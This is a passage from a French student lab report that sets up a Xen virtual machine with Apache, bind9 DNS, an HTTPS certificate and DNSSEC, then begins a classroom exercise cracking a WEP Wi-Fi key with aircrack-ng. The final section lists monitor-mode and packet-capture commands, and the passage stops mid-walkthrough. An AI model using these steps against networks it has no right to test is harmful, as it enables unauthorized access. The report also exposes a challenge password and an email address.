     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS/DNSSEC bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires le gestionnaire de RAID Logiciel Mdadm ====&lt;br /&gt;
Mdadm est une solution de RAID logiciel très fiable et très répandue dans la communauté Linux. Ce paquetage sera nécessaire pour la création d'un RAID5&lt;br /&gt;
   apt install mdadm&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
   '''dnssec-validation auto;'''&lt;br /&gt;
   '''dnssec-enable yes;'''&lt;br /&gt;
   '''dnssec-lookaside auto;'''&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a relancer , et on peut voir le résultat grâce à [https://dnsviz.net DNSVIZ]&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
